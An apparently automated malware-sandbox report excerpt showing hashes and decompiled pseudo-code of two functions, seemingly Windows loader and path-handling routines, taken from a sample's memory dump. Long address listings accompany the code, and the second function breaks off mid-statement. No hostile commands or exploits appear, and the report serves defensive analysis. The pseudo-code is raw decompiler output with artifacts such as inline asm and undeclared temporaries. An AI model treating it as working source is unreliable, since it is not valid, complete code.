                                        0x01775c10
                                        0x017763da
                                        0x017763e5
                                        0x017763e5

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4846cbfcd6982912839ce92d63a55ad91042bbcccfe0bf44ace4b0e8144ed918
                                        • Instruction ID: 705ed7471de152acb2a3bb1c4078536118fbb47ece2587683b2a8fac13ad1df1
                                        • Opcode Fuzzy Hash: 4846cbfcd6982912839ce92d63a55ad91042bbcccfe0bf44ace4b0e8144ed918
                                        • Instruction Fuzzy Hash: A5424B75900629CFEB24CF68C880BA9FBB1FF49304F1581EAE94DAB246D7749985CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016C4120 Relevance: .4, Instructions: 444COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 92%
                                        			E016C4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x179d360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E016DF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E016C6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L016C4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E016C6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M016C45F8))) {
												case 0:
													_v568 = 0x1681078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x16811c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L016C4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E016EF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E016EF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E016A52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E016BEB70(1, 0x17979a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E016BAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E016E95D0();
																			L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E016EB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E016E3D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E016EB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































                                        0x016c4128
                                        0x016c4135
                                        0x016c413c
                                        0x016c4141
                                        0x016c4145
                                        0x016c4147
                                        0x016c414e
                                        0x016c4151
                                        0x016c4159
                                        0x016c415c
                                        0x016c4160
                                        0x016c4164
                                        0x016c4168
                                        0x016c416c
                                        0x016c417f
                                        0x016c4181
                                        0x016c446a
                                        0x016c446a
                                        0x016c418c
                                        0x016c4195
                                        0x016c4199
                                        0x016c4432
                                        0x016c4439
                                        0x016c443d
                                        0x016c4442
                                        0x016c4447
                                        0x00000000
                                        0x016c419f
                                        0x016c41a3
                                        0x016c41b1
                                        0x016c41b9
                                        0x016c41bd
                                        0x016c45db
                                        0x016c45db
                                        0x00000000
                                        0x016c41c3
                                        0x016c41c3
                                        0x016c41ce
                                        0x016c41d4
                                        0x0170e138
                                        0x0170e13e
                                        0x0170e169
                                        0x0170e16d
                                        0x0170e19e
                                        0x0170e16f
                                        0x0170e16f
                                        0x0170e175
                                        0x0170e179
                                        0x0170e18f
                                        0x0170e193
                                        0x00000000
                                        0x0170e199
                                        0x00000000
                                        0x0170e199
                                        0x0170e193
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016c41da
                                        0x016c41da
                                        0x016c41df
                                        0x016c41e4
                                        0x016c41ec
                                        0x016c4203
                                        0x016c4207
                                        0x0170e1fd
                                        0x016c4222
                                        0x016c4226
                                        0x0170e1f3
                                        0x0170e1f3
                                        0x016c422c
                                        0x016c422c
                                        0x016c4233
                                        0x0170e1ed
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016c4239
                                        0x016c4239
                                        0x016c4239
                                        0x016c4239
                                        0x016c4233
                                        0x016c4226
                                        0x016c41ee
                                        0x016c41ee
                                        0x016c41f4
                                        0x016c4575
                                        0x0170e1b1
                                        0x0170e1b1
                                        0x00000000
                                        0x016c457b
                                        0x016c457b
                                        0x016c4582
                                        0x0170e1ab
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016c4588
                                        0x016c4588
                                        0x016c458c
                                        0x0170e1c4
                                        0x0170e1c4
                                        0x00000000
                                        0x016c4592
                                        0x016c4592
                                        0x016c4599
                                        0x0170e1be
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016c459f
                                        0x016c459f
                                        0x016c45a3
                                        0x0170e1d7
                                        0x0170e1e4
                                        0x00000000
                                        0x016c45a9
                                        0x016c45a9
                                        0x016c45b0
                                        0x0170e1d1
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016c45b6
                                        0x016c45b6
                                        0x016c45b6
                                        0x00000000
                                        0x016c45b6
                                        0x016c45b0
                                        0x016c45a3
                                        0x016c4599
                                        0x016c458c
                                        0x016c4582
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016c41f4
                                        0x016c423e
                                        0x016c4241
                                        0x016c45c0
                                        0x016c45c4
                                        0x00000000
                                        0x016c45ca
                                        0x016c45ca
                                        0x00000000
                                        0x0170e207
                                        0x0170e20f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x016c45d1
                                        0x00000000
                                        0x00000000
                                        0x016c45ca
                                        0x00000000
                                        0x016c4247
                                        0x016c4247
                                        0x016c4247
                                        0x016c4249
                                        0x016c4249
                                        0x016c4249
                                        0x016c4251
                                        0x016c4251
                                        0x016c4257
                                        0x016c425f
                                        0x016c426e
                                        0x016c4270
                                        0x016c427a
                                        0x0170e219
                                        0x0170e219
                                        0x016c4280
                                        0x016c4282
                                        0x016c4456
                                        0x016c45ea
                                        0x00000000
                                        0x016c45f0
                                        0x0170e223
                                        0x00000000
                                        0x0170e223
                                        0x016c445c
                                        0x016c445c
                                        0x00000000
                                        0x016c445c
                                        0x00000000
                                        0x016c4288
                                        0x016c428c
                                        0x0170e298
                                        0x016c4292
                                        0x016c4292
                                        0x016c429e
                                        0x016c42a3
                                        0x016c42a7
                                        0x016c42ac
                                        0x0170e22d
                                        0x016c42b2
                                        0x016c42b2
                                        0x016c42b9
                                        0x016c42bc
                                        0x016c42c2
                                        0x016c42ca
                                        0x016c42cd
                                        0x016c42cd
                                        0x016c42d4
                                        0x016c433f
                                        0x016c433f
                                        0x016c42d6
                                        0x016c42d6
                                        0x016c42d9
                                        0x016c42dd
                                        0x016c42eb
                                        0x0170e23a
                                        0x016c42f1
                                        0x016c4305
                                        0x016c430d
                                        0x016c4315
                                        0x016c4318
                                        0x016c431f
                                        0x016c4322
                                        0x016c432e
                                        0x016c433b
                                        0x016c433b
                                        0x00000000
                                        0x016c432e
                                        0x016c42eb
                                        0x016c434c
                                        0x016c434e
                                        0x016c4352
                                        0x016c4359
                                        0x016c435e
                                        0x016c4361
                                        0x016c436e
                                        0x016c438a
                                        0x016c438e
                                        0x016c4396
                                        0x016c439e
                                        0x016c43a1
                                        0x016c43ad
                                        0x016c43bb
                                        0x016c43bb
                                        0x016c43ad
                                        0x016c436e
                                        0x016c43bf
                                        0x016c43c5
                                        0x016c4463
                                        0x016c4463
                                        0x016c43ce
                                        0x016c43d5
                                        0x016c43d9
                                        0x016c43df
                                        0x016c4475
                                        0x016c4479
                                        0x016c4491
                                        0x016c4491
                                        0x016c4479
                                        0x016c43e5
                                        0x016c43eb
                                        0x016c43f4
                                        0x016c43f6
                                        0x016c43f9
                                        0x016c43fc
                                        0x016c43ff
                                        0x016c44e8
                                        0x016c44ed
                                        0x016c44f3
                                        0x0170e247
                                        0x00000000
                                        0x016c44f9
                                        0x016c4504
                                        0x016c4508
                                        0x016c450f
                                        0x0170e269
                                        0x00000000
                                        0x016c4515
                                        0x016c4519
                                        0x016c4531
                                        0x016c4534
                                        0x016c4537
                                        0x016c453e
                                        0x016c4541
                                        0x016c454a
                                        0x0170e255
                                        0x0170e255
                                        0x0170e25b
                                        0x0170e25e
                                        0x0170e261
                                        0x0170e261
                                        0x016c4555
                                        0x016c4559
                                        0x016c455d
                                        0x0170e26d
                                        0x0170e270
                                        0x0170e274
                                        0x0170e27a
                                        0x0170e27d
                                        0x0170e28e
                                        0x0170e28e
                                        0x016c4563
                                        0x016c4563
                                        0x016c4569
                                        0x016c4569
                                        0x00000000
                                        0x016c455d
                                        0x016c450f
                                        0x00000000
                                        0x016c44f3
                                        0x016c43ff
                                        0x016c4405
                                        0x016c4405
                                        0x016c4405
                                        0x016c42ac
                                        0x016c428c
                                        0x016c4282
                                        0x016c4407
                                        0x016c440d
                                        0x0170e2af
                                        0x0170e2af
                                        0x016c4413
                                        0x016c4413
                                        0x00000000
                                        0x016c41d4
                                        0x00000000
                                        0x016c41c3
                                        0x016c41bd
                                        0x016c4415
                                        0x016c4415
                                        0x016c4416
                                        0x016c4417
                                        0x016c4429
                                        0x016c416e
                                        0x016c416e
                                        0x016c4175
                                        0x016c4498
                                        0x016c449f
                                        0x0170e12d
                                        0x00000000
                                        0x0170e133
                                        0x00000000
                                        0x0170e133
                                        0x016c44a5
                                        0x016c44a5
                                        0x016c44aa
                                        0x00000000
                                        0x016c44bb
                                        0x016c44ca
                                        0x016c44d6
                                        0x016c44d7
                                        0x016c44d8
                                        0x016c44e3
                                        0x016c44e3
                                        0x016c44aa
                                        0x016c417b
                                        0x016c417b
                                        0x016c417b
                                        0x00000000
                                        0x016c417b
                                        0x016c4175
                                        0x00000000

                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 80e7bc5696f85438648d412e7d3fa25f909d2fee9c2fc41ea874d7fad504d58e
                                        • Instruction ID: 900e654efd0c347096d28cf36d80092885cf962ca1e24b4dd738bd0eb82cebe4
                                        • Opcode Fuzzy Hash: 80e7bc5696f85438648d412e7d3fa25f909d2fee9c2fc41ea874d7fad504d58e
                                        • Instruction Fuzzy Hash: 78F16E70508351CBD725CF19C890A7ABBE2EF98B14F54892EF586C7391EB34D882CB52
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 016BD5E0 Relevance: .4, Instructions: 353COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 87%
                                        			E016BD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x179d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E016B6600(0x17952d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1797b9c; // 0x0
							_t281 = L016C4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E016EF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1797b90; // 0x77880000
								if(_t384 == 0) {
									_t353 =  *0x1797b8c; // 0x1242a18
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E016C2280(_t200, 0x17984d8);
									_t277 =  *0x17985f4; // 0x1242f08
									_t351 =  *0x17985f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x1242ea0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E016BFFB0(_t287, _t353, 0x17984d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E016FCC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E016B6600(0x17952d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E016B7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x179b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0172E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x1798472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														asm("ror edi, cl");
														 *0x179b1e0( &_v192, _t353, _v168, 0, _v180);
														 *( *0x179b218 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E016C2280(_t250, 0x17984d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L016E3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E016BFFB0(_t293, _t353, 0x17984d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E016E37F5(_t353, 0);
																}
																E016E0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E016D9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E016D02D6(_t174);
																}
																L016C77F0( *0x1797b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E016DC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L016BEC7F(_t353);
										L016D19B8(_t287, 0, _t353, 0);
										_t200 = E016AF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0 || ( *0x179b2f8 |  *0x179b2fc) == 0 || ( *0x179b2e4 & 0x00000001) != 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E016EB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_v200 = 0;
									if(( *0x179b2ec >> 0x00000008 & 0x00000003) == 3) {
										_t355 = _v168;
										_t342 =  &_v208;
